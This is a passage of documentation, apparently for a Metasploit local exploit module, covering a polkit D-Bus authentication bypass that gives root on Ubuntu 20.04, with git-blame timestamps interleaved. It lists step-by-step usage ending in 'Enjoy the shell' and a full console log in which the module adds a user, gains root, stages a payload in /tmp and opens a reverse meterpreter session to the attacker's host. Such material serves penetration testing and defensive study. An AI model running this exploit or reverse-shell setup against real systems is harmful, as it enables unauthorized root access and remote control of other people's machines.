2021-06-25 18:00:08 -04:00
## Description
2021-06-28 14:02:51 -04:00
This module exploits a authentication bypass in Linux machines that make use of the polkit system service.
2021-06-25 18:00:08 -04:00
The vulnerability enables an unprivileged local user to get a root shell on the system.
2021-07-07 12:00:07 -05:00
This exploit needs be run from an SSH or non-graphical session. The `dbus-send` command which is used to trigger the exploit,
launches an authentication agent. When run from a graphical session, an authentication agent pops up in the form of a
dialog box and waits for user input. This dialog box will cause the dbus-command to time out waiting for user input and
will prevent successful exploitation of polkit
2021-07-08 15:38:35 -05:00
If `systemd` is installed on the system the session service type can be checked by running: `loginctl session-status` .
2021-07-07 12:00:07 -05:00
The following output (x11) indicates a graphical session is being run and the exploit will not work:
`Service: gdm-password; type x11; class user`
The following output (tty) indicates a non-graphic session is being used and the exploit is likely to be successful:
`Service: sshd; type tty; class user`
2021-06-25 18:00:08 -04:00
## Vulnerable Application
This module has been tested successfully on:
2021-07-07 12:00:07 -05:00
2021-06-25 18:00:08 -04:00
* Ubuntu 20.04
### Installation And Setup
Download and install Ubuntu 20.04 from the Ubuntu Downloads page: https://ubuntu.com/download/desktop
## Verification Steps
1. Start msfconsole.
2. Get a session.
3. Do: `use exploit/linux/local/polkit_dbus_auth_bypass` .
4. Set the `SESSION` to the session obtained in step 2.
5. Set the `LHOST` , `LPORT` and `PAYLOAD` options as appropriate.
6. Do: `run` .
2021-07-07 12:00:07 -05:00
7. It is possible for the exploit to fail. If this happens, increase the value of the ITERATIONS option to attempt the exploit more times before failing and attempt the exploit again.
2021-06-25 18:00:08 -04:00
8. Enjoy the shell.
## Options
**SESSION **
The session to run this module on.
**USERNAME **
The name of the user the exploit will add to the system
**PASSWORD **
The password for the user to be created
2021-06-28 14:02:51 -04:00
**WritableDir **
Directory to write file to (`%TEMP%` by default).
2021-06-25 18:00:08 -04:00
## Scenarios
### Tested on Ubuntu 20.04
```
msf6 > use multi/handler
[*] Using configured payload linux/x64/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > run
2021-07-07 12:00:07 -05:00
[*] Started reverse TCP handler on 0.0.0.0:4444
2021-06-25 18:00:08 -04:00
[*] Meterpreter session 1 opened (192.168.123.1:4444 -> 192.168.123.146:49882) at 2021-06-25 17:54:45 -0400
meterpreter > bg
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use polkit_dbus
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/local/polkit_dbus_auth_bypass 2021-06-03 excellent Yes Polkit Authentication Bypass
Interact with a module by name or index. For example info 0, use 0 or use exploit/linux/local/polkit_dbus_auth_bypass
[*] Using exploit/linux/local/polkit_dbus_auth_bypass
msf6 exploit(linux/local/polkit_dbus_auth_bypass) > set lhost 192.168.123.1
lhost => 192.168.123.1
msf6 exploit(linux/local/polkit_dbus_auth_bypass) > set lport 4443
lport => 4443
msf6 exploit(linux/local/polkit_dbus_auth_bypass) > set session 1
session => 1
msf6 exploit(linux/local/polkit_dbus_auth_bypass) > run
2021-07-07 12:00:07 -05:00
[*] Started reverse TCP handler on 192.168.123.1:4443
2021-06-25 18:00:08 -04:00
[*] Executing automatic check (disable AutoCheck to override)
2021-06-30 11:54:13 -04:00
[*] Checking for exploitability via attempt
2021-06-25 18:00:08 -04:00
[+] The target is vulnerable. The polkit framework instance is vulnerable.
[*] Attempting to create user msf
[+] User msf created with UID 1019
[*] Attempting to set the password of the newly create user, msf, to: NpJsQSti
2021-07-08 15:38:35 -05:00
[+] Obtained code execution as root!
2021-06-25 18:00:08 -04:00
[*] Writing '/tmp/vOWnn' (207 bytes) ...
[*] Sending stage (984904 bytes) to 192.168.123.146
[+] Deleted /tmp/vOWnn
[*] Meterpreter session 2 opened (192.168.123.1:4443 -> 192.168.123.146:42066) at 2021-06-25 17:55:27 -0400
2021-07-07 12:00:07 -05:00
[*] Attempting to remove the user added:
2021-06-25 18:00:08 -04:00
[+] Successfully removed msf
meterpreter > getuid
Server username: root @ ubuntu (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer : 192.168.123.146
OS : Ubuntu 20.04 (Linux 5.8.0-55-generic)
Architecture : x64
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
```
